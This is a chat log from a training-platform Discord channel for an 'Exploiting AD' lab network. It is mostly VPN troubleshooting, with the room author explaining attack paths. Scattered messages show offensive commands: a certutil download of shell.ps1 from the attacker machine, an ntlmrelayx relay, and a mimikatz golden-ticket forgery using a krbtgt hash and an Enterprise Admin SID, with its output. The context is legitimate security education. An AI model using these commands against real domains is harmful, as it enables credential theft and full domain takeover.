#exploiting-ad
Import should work with that. Just a note: you should not drag and drop the json files but rather the entire zip itself.
Glad you like it
I didn't know I could D&D the zip file.
Let me try that
Hope that works. The results were captured with the latest version of SH (v4), so they should be fully importable
Doesn't seem to work hmm. I collected with Bloodhound.py commit 0b82612b124dfd48fd66b66ee0c2c10a243f8e6e (which is like 1 year old lol), that worked
No clue why it doesn't work on your version. Haven't had complaints on v4 before. Might just be a weird outlier.
I just pulled my Bloodhound to current master, still not working. Whatever, as long as it works with my collected jsons it's fine lol
In Task 6 I can not edit the given GPO. I have RDPed as both the initial user and the t2 admin I compromised, I can use dir \\za.tryhackme.loc\sysvol and get the new shell to open mmc but the edit option is greyed out.
Read the task carefully. You can also verify this with bloodhound, but the account that has the permissions to modify that GPO is the account you find in the Keepass file.
Check this bloodhound diagram. So you RDP in with your low-privileged account, use runas to inject the SVC account, and then open MMC to modify the GPO.
I was typing the wrong password due to typing mistake. Room completed.
I always get an error in this part. What is a leap of faith?
ok something is not right. I would like to work on the room from my own attacking machine and the vpn connection is not working, how can I get support?
I'm not doing anything wrong, the openvpn file is not available
Can you give a bit more context please? Are you getting a 404 when you download your VPN file? Have you regenerated your VPN file?
So you don't need to do the print spooler attack. You already have admin access on THMSERVER1 with what you did in the last task. It is however good to still learn about the print spooler attack.
The issue however is that once one user runs the attack wrong, it will kill the entire print spooler service, meaning no one else can attempt the attack. For this reason, we made the task optional, so you can continue to the next task if it fails for you. A network reset would bring the print spooler service back online if you really want to try it. But at least you can continue with the network should it fail for you
Yeah known issue by the frontend team. Can you please send me your subnet in the network diagram? I'll report it for the network so support can get it sorted. Might just take a bit of time since they won't be online for a couple of hours so sorry about that
Go to the room page: https://tryhackme.com/jr/exploitingad
Screenshot the network diagram
this
Jip that one. I've forwarded it to support. Will let you know once it is sorted. Sorry for the delay
ty
Fix has been applied. You may have to reset the network, but it should be working now. Please just also regen your VPN
hello, don't know if this is the right room to ask this question, but I want to know what is the correct order to do the newly released AD networks?
Hey there, order should be:
- AD Basics (if you are new to AD)
- Breaching AD
- Enumerating AD
- Lateral Movement and Pivoting
- Exploiting AD
- Persisting AD (Coming out this week)
Thank you
Gave +1 Rep to @glacial stream
hey guys, I've started to walk through the Exploiting AD lab a 2nd time (it was reset and stopped recently) and noticed that members of IT support seem to have RDP access to THMSERVER2 straight from the beginning, and THMSERVER2 has GenericAll over THMSERVER1, so the exploiting Users/GPOs part can actually be skipped if you want to have a speed-run over the network, am I right?
@glacial stream , this is greatest lab series I've passed over last year, thank you!
Gave +1 Rep to @glacial stream
Thank you for the answer!
Gave +1 Rep to @glacial stream
Hey @real mesa ,
Glad you are enjoying the network series
So with these networks you can speedrun anything. You can even pop the DC from your first low-privilege access. But then you lose out on the learning opportunity. These networks are not CTFs in the sense that it is who can compromise them first, but more a walkthrough for you to learn new things. So users are more than welcome to speedrun, we won't police it, but they will lose out on the learning opportunity.
In terms of what you are describing, there are two ways to compromise THMSERVER1. You can either use the constrained delegation or you could use the Print spooler for relaying the machine account of THMSERVER2.
For compromising THMSERVER2, the intended path is to first compromise the AD user and then perform the GPO, but once a user in the network performs the GPO exploit, it will open that path up for everyone else. If you want to do it completely from scratch, you will need a network reset.
However, the nice thing is the AD user exploit you have to do to get the flags, since the flag is embedded in the keepass file, for which you can only get the key by keylogging that local user, so that creates a nice little gate to ensure users explore that task.
All in all, for all of these networks you will be able to cheese them. Heck, in the persisting AD one coming out this week we give you the DA credentials! But if a user only does this to get the points, then I think they are missing the point of these networks. So my recommendation is to take your time, work through the content and hopefully learn something new
yup totally agree here, it's worth learning all the techniques because in real life scenarios there might not be so many possible vectors
lemme check how to get DC from 1st low-priv user though
Hey, wonder if someone can help me, get errors when importing kirbi tickets for trevor : File: 'TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)
hey @storm coral , it means tkt is not in the right folder
if you don't want to state the absolute path for it - just move the tkt next to mimikatz.exe/Rubeus.exe
Yeah i just realised after i posted, lol, thanks, sorry to bother
np
BTW, is there any lab/network which covers AV evasion specifically for AD pentest? I've heard that even opening cmd.exe may trigger an alert on the Blue Team side if the network has good AV in place
why can't i download shell.ps1?
You're using the wrong ip address. run ip a on the attackbox and look for the vpn connection. I think it'll say "exploitingad" as the connection name. You want that IP address, as that's your VPN IP to connect to the AD network.
thx for help
How can I upload this database to attackbox?
gonna need more specifics. What task, and what are you trying to do?
this question
does SCP work? I can't remember off the top of my head.
Hey guys, klist shows cached tickets for trevor but can't get PSSession, anyone got any ideas: New-PSSession : [thmserver1.za.tryhackme.loc] Connecting to remote server thmserver1.za.tryhackme.loc failed with the following error message : A specified logon session does not exist. It may already have been terminated. For more information, see the about_Remote_Troubleshooting Help topic
did you use that syntax for the command? or the syntax in the room? New-PSSession -ComputerName thmserver1.za.tryhackme.loc
Forgot to reply
@lucid pagoda I used New-PSSession -ComputerName thmserver1.za.tryhackme.loc and did get a session, but then lab dropped had to start again went through lab again to same point but got that syntax. Do I have to wait for this all to be reset?
Possibly, I know some people have been seeing some site errors
Oh okay, I've marked for a reset and hopefully get done overnight.
@lucid pagoda looks great, thank you!
Gave +1 Rep to @lucid pagoda
I'm on task 5 of Exploiting AD. For some reason, I can't get my shell.ps1 file over to thmserver1 using the provided command: certutil.exe -urlcache -split -f http://[my attackbox ip]/shell.ps1
bah - nevermind ... just scrolled up a bit and saw someone else was having the exact same issue. I was using the wrong IP address.
Can anyone help me setting up connection
im not able to connect to network
VPN is getting reset
Show a screenshot please.
Have you tried to regen your config?
And that's the new one?
openvpn
Can you do ip a s and see how many tun* you have?
their is no tun*
Any exploitad ?
Isn't that the cipher issue?
As far as I can see from the screenshot.
D'oh.
This isn't htb though.
You need to go to #site-support and do the steps in the first pinned post.
Thanks buddy, finally got connected, it was an openvpn issue
Gave +1 Rep to @wintry oriole
Gave +1 Rep to @hollow oak
I'm still stuck with the room Exploiting AD... I can't get the .ovpn file... I already reported this last week, first time I have an issue like this... Hope it gets resolved soon
I'm having a similar issue. The ovpn file is not connecting and can't regenerate it or download again
We did resolve that issue in the network you were having? If you still have the same issue let me know. But it might be good to leave the room and rejoin, just in case
I am working through the first 3 tasks right now on YouTube. Feel free to join along and we can learn this room together
https://www.youtube.com/watch?v=KfbxgD9XK30&ab_channel=TylerRamsbey
This is the first video of working through the "Exploiting AD" network on TryHackMe.
We use bloodhound to enumerate the network further and then exploit permission delegation to take over the account of a Tier 2 Administrator. After that, we then pivot to a Tier 1 Administrator by abusing Kerberos and getting a Remote Powershell Session on ano...
How do I leave the room?
There is a cog at the top right.
Is yours not working? (subnet) ?
reset?
wait the attackbox works with networks now????
It has done since the start of the new rooms.
oh that is nice
Hey all -- I am live on Twitch right now to continue working through this room. The creator of the room - @glacial stream - often joins and offers some great tips/teaching as well. I'll be streaming for the next 2 hours or so. Feel free to stop by and we can work through the room together
https://twitch.tv/hack_smarter
Can you download your VPN or still that issue? We did a reset and verified that VPN downloads work. If that still fails for you, can you send me your subnet?
It auto-connects via your openvpn profile if you start it in a network room. If you have multiple vpn network profiles it sometimes gets a bit confused, but generally works
Also to combat this, we have started to name the adapters of the VPN tunnels. Meaning you can search for the adapter name. Exploiting-AD's adapter name is exploitad. So easy to know which adapter is which network
Would it be possible to get the 10.200.83.x Exploiting AD network reset? The "Network State" has been "Resetting" since I joined the room almost 24 hours ago.
I've been enjoying this room - I stopped halfway through and realised I presumably have to start the path of escalation again from scratch? No problem to reinforce my learning but I'd like to be aware this time I can't stop haha.
Just checking, Have you left and rejoined the room/refreshed?
Yes, more than once. On the attackbox no "exploitad" interface is found, either. Manually pinging the network doesn't work either.
guessing it also isn't showing up in the /access page then? Sounds like it doesn't think you're in the room if that's the case. I'll see what we can troubleshoot.
Thanks!
Can you confirm what you see at https://tryhackme.com/access?type=networks ? (If exploiting AD is listed)
It looks like this was the same network that someone else was having trouble with yesterday...
Yes, "Exploitingad" shows on the network access page.
Never tried connecting with my own VM, but I could if you would like me to?
Might be useful for troubleshooting if you can, but i've also passed it on for it to be looked at.
Yup, will do.
Ok, when I try to download the config file for network access the page errors out. I regenerated twice and the same thing happens.
404 I assume?
Yes, 404.
Gotcha, I'll let you know when something changes with it.
Great, thanks!
flag3.txt is not existing on THMSERVER1
```
za\t2_ross.bird@THMWRK1 C:\Users\Administrator.ZA\Desktop>dir
 Volume in drive C is Windows
 Volume Serial Number is 1634-22A9

 Directory of C:\Users\Administrator.ZA\Desktop

07/08/2022 02:09 PM <DIR> .
07/08/2022 02:09 PM <DIR> ..
```
and I cant get the remote shell to be working with:
```
python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"10.200.83.201" -debug
```
Looks like you are running dir on THMWRK1 not THMSERVER1?
You will need to provide more information here. But the print spooler attack is unstable in the sense that one user can kill the service for everyone, which is why there is the note that says you can continue and come back to it.
You are totally right mate! me who got lost there in all the hacking
Great room! totally got the servers wrong there for a while which f'd up things. Thanks @glacial stream for pointing out the direction
Gave +1 Rep to @glacial stream
Is this error because the server needs a reboot? * File: 'TGS_t1_jay.wilson@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)
Seems to happen regardless of which user I try. * File: 'TGS_t1_duncan.moran@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)
Hi @glacial stream it seems like this network is down : 10.200.19.101
Can you cat /etc/resolv.conf ?
FYI the network wasn't started just now; not sure if you checked this at the time...
I am still getting this error today after a reset, not entirely sure what's going on
I know the network isn't started just now, I was in the ssh session & suddenly the network went down
After the network reset it's working fine now
Network 10.200.83.101 is stuck at "Resetting" for few hours.
Any update on the 10.200.83.x network? It has been more than 48 hours that the "Network State" has been "Resetting".
Another method for task 3 would be to use the credentials after dumping lsass to create a service ticket with impacket and get access that way
okaaaay 
Thanks
first time using keepass 
I tried using "New-PSSession" for task 8 when trying to get the flag but I kept getting "Permission Denied". Is it because remote sessions are not allowed on the root domain?
Also, maybe I'm misunderstanding this but we want those two SIDs because 1) We are pretending to be a valid DC to the root domain and 2) We use the EA group SID because we want to become a "member" of this group in a way?
What am I doing wrong in Task 8?
```
mimikatz # kerberos::golden /user:Administrator /Domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
User      : Administrator
Domain    : za.tryhackme.loc (ZA)
SID       : S-1-5-21-3885271727-2693558621-2658995185-1001
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3330634377-1326264276-632209373-519 ;
ServiceKey: 16f9af38fca3ada405386b3b57366082 - rc4_hmac_nt
Service   : krbtgt
Lifetime  : 7/9/2022 8:32:23 PM ; 7/6/2032 8:32:23 PM ; 7/6/2032 8:32:23 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ za.tryhackme.loc' successfully submitted for current session
```
It's giving my Unauthorised Access when trying to view the RootDC
Is the network started? Start by first just pinging the hosts. If that works try nslookup za.tryhackme.loc <DC IP> to verify DNS is alive. If both of those work, revisit your DNS configuration please
If root owns it, you must run KeepassX as root as well, else it will fail to open the DB
The sid you specify in /sid: should be the SID of the actual domain controller machine account in the child domain. The extra sid is the SID of the EA group in the parent domain. So with these two combined, your EA golden ticket should work.
I'm not sure if the golden ticket would automatically work for a PS-Session, you may have to generate a TGS for the HTTP and WSMAN services. A simpler approach to complete the task would be to use the dir command to access the file system of the RootDC
How are you trying to access the RootDC? On which machine are you performing these steps?
I was able to get the flag, I was just curious why ps-session wouldn't work in this case because it was working on thmdc.za.tryhackme.loc, and the sid question was more about why these two sids, just to make it a little clearer for myself
Mmm, it might be that PS-Session automatically gets a TGS based on the SID and not the extra SIDS? I'm not entirely sure why it would not work, but that would be my guess. So you would have to do a bit more work from that perspective to get the correct TGS for PS-Session on ROOTDC.
Ok I think I see what you mean, I can look more into that with the SID and PSSession
Oh I was doing it on THMSERVER2 still, as I'd just done the certificates there. When I opened a pssession on thmdc it didn't have mimikatz so assumed it was to be done elsewhere.
Out of interest, were you doing PS-Session with the IP or the DNS hostname?
DNS
Mmm, yeah then it was using kerberos. So that was not the issue. Something to play around with and see how you can get it to work
It was like PS-Session -ComputerName thmdc.etc
It might not make the biggest difference, but I've had strange cases where it works best for me to do the PTT on THMDC itself. Passing tickets can sometimes do weird things, might be good just to run klist to see what current active tickets you have since some might interfere with your golden ticket
Yeah that would invoke Kerberos authentication, which should work with the golden ticket. I'll investigate a bit somewhere and see what additional step is required
There's 5 tickets, presumably because I kept trying it. All variations of this #3> Client: Administrator @ ZA.TRYHACKME.LOC Server: cifs/thmrootdc.tryhackme.loc @ TRYHACKME.LOC KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 7/9/2022 20:59:14 (local) End Time: 7/10/2022 5:59:32 (local) Renew Time: 7/16/2022 19:59:32 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: THMROOTDC.tryhackme.loc
Sounds good!
I'd suggest flushing those. Might be having some conflicts there. I'm not in front of my pc so can't look for the command, but just restarting your SSH session might work.
Hm, I did again and had the same thing (generated 5 tickets) so did Powershell as Administrator in RDP (just trying random solutions) and it worked.
These rooms are pretty amazing btw, very well explained, you must have an exceptional understanding of Active Directory.
I'll probably run them all a couple of times just to make sure it sinks in. Lucky we have access to this resource!
Welp, glad that worked at least!
Glad you like them and can use them as a reference point! Glad you like the explanations as well.
I'm by no means an AD expert. These rooms feature techniques I've learned over the last couple of years on assessments but honestly this is the tip of the iceberg. It is such a massive attack surface that you can spend a good amount of years and still not even scratch the surface.
Hopefully these rooms create a good starting point to learn AD and then inspire others to explore on their own and hopefully share their findings with the rest of us so we can all learn. SpectorOps with their Active Directory Certificate Service research is such a prime example of this. Hopefully we get more of these in the years to come!
There's such incredible depth to it all, it's amazing how complex it is. You manage to explain the techniques well, usually a sign that someone has a great understanding of what they're doing!
Thanks for the kind words. Remember to pay it forward when you learn something new, then it will be your turn to teach others
Gave +1 Rep to @spring bridge
Can you check again? I brought this up that day, so I'm assuming it's fixed now, otherwise i'll chase it?
All good, now. I think the network access finally expired and I was able to join a new network. Thanks.
Gave +1 Rep to @lucid pagoda
Network 10.200.83.101 is still stuck at "Resetting" for few days, can someone please check?
Network should be online, can you perhaps verify somewhere today?
Hey, can you please DM me your THM username so we can inspect the network?
Isn't impacket psexec now likely to be caught by AV? I think I've heard something like that in an ippsec video
If someone could enlighten us
Yeah it is, luckily this network has a pure AD exploitation focus, so no AV installed here, not even Windows Defender
Should not be enabled no. All the other powershell scripts that should be blocked like powerview does go past. Not sure why that specific powershell script was being finicky, but I had it where if I did powershell -c "script.ps1 from a cmd.exe window it would fail, but when I actually go into powershell, it would work.
huh wut, I have ssh'd into one of the Tier 2 Admins on Task 2 but can't access the Administrator folder, access is denied? Am I stupid or?
oh wait
I'm stupid maybe hold on
ok I was stupid indeed, I understand the mistake I did
If it became unresponsive it is probably the network that just went to sleep. There is a frontend bug where if the network timer runs out and you click extend instead of refreshing the page to click start, it bricks the network. You can solve this by using inspect element to re-enable the Start button and press it, and your network should come back online. The team is aware of this and working on a fix
Gave +1 Rep to @glacial stream
Thanks for the update! I'll keep this in mind if others ask. Glad you are liking the series
Gave +1 Rep to @violet condor
Been like this for a good 40 minutes, am i missing something?
What is your subnet in the network diagram?
83
Can you please DM me your username? There seems to be a network conflict between this network and a wreath network that needs to get sorted but the team will need your THM username to investigate
hello, anyone else have a DNS connection timeout issue through openvpn?
This will be crazy.
Try nslookup in root.
nslookup
Changed nothing and it's working now
Sometimes it won't display straight away.
I found that when I was doing it, it wouldn't do nslookup unless I was in root for about 20 mins
Hello everyone, anyone else have the network stuck in resetting status?
I can not access the network either, it keeps resetting...
I've reported this network. I think we are going to kill the subnet with fire next since this specific one keeps giving us issues. Can you click on the gear icon next to Start AttackBox, click leave room, then wait an hour and then rejoin the room, hopefully it drops you into a different subnet while we fix this subnet. Sorry for the inconvenience
Should be solved now, you might just have to leave the room and rejoin it
Should be solved now, you might just have to leave and rejoin the room
seems broken again
Network is reporting stable from the VPN server:
```
ubuntu@ip-10-200-83-250:~$ nmap -p22,3389 10.200.83.100 10.200.83.101 10.200.83.201 10.200.83.202 10.200.83.248 -Pn

Starting Nmap 7.60 ( https://nmap.org ) at 2022-07-14 16:47 UTC
Nmap scan report for ip-10-200-83-100.eu-west-1.compute.internal (10.200.83.100)
Host is up (0.00084s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap scan report for ip-10-200-83-101.eu-west-1.compute.internal (10.200.83.101)
Host is up (0.00044s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap scan report for ip-10-200-83-201.eu-west-1.compute.internal (10.200.83.201)
Host is up (0.00052s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap scan report for ip-10-200-83-202.eu-west-1.compute.internal (10.200.83.202)
Host is up (0.00074s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap scan report for ip-10-200-83-248.eu-west-1.compute.internal (10.200.83.248)
Host is up (0.00073s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap done: 5 IP addresses (5 hosts up) scanned in 2.24 seconds
```
thanks, i'll recheck my box
i'm stuck on the .60 subnet
@velvet hawk Did you try leaving the network and rejoining?
how long do we have to leave the room for a new subnet?
click leave room, then wait an hour and then rejoin the room, hopefully it drops you into a different subnet
ok, I'll try that, thanks!
Gave +1 Rep to @surreal python
what a great room, thanks @glacial stream !
Gave +1 Rep to @glacial stream
@glacial stream typo SpecterOps
For those interested, here is a 3-part series where I work through this entire room. @glacial stream was online with me for most of the streams offering advice and tips. Enjoy!
Exploiting AD (Part 1) -- https://youtu.be/KfbxgD9XK30
Exploiting AD (Part 2) -- https://youtu.be/ezdDMkMyHVM
Exploiting AD (Part 3) -- https://youtu.be/5tVDVptZH_w
I have now covered completely via video Enumerating AD, Breaching AD, Lateral Movement, and Exploiting AD. I'll be starting persisting AD on stream tonight
Thanks for all these AD rooms they are awesome @glacial stream
Gave +1 Rep to @glacial stream
Thanks for reporting, will get it fixed
Gave +1 Rep to @quiet coral
Glad you liked it!
Glad you liked it!
Hey @glacial stream I'm thinking of setting up the GOAD Lab for on-demand AD breaking haha. Do you think an old i5 laptop with 8gb of ram would cope? It's 5VMs requiring 1gb RAM per. I've no idea how intensively these things run.
You should be able to cope. Depends on how much ram the system uses at idle. So for example, run those 5 VMs but please don't run Chrome as well
My VMs usually use 2 Gb of RAM instead of 1, else you can experience quite a bit of performance degradation, but I'd honestly give it a go!
It'll just be running some super low resource flavour of Linux and the 5VMs, otherwise it'll be doing nothing.
I used to like crashbang++ but it's something else now. Will give it a go and see how they work.
Good luck there!
responder
yes, that is indeed a thing that exists
Is there anyone who can help me to Exploit and Escalate this Windows machine, please? I am still a newbie
This channel is for the Exploiting AD room on THM. Please go ask in #general or another channel.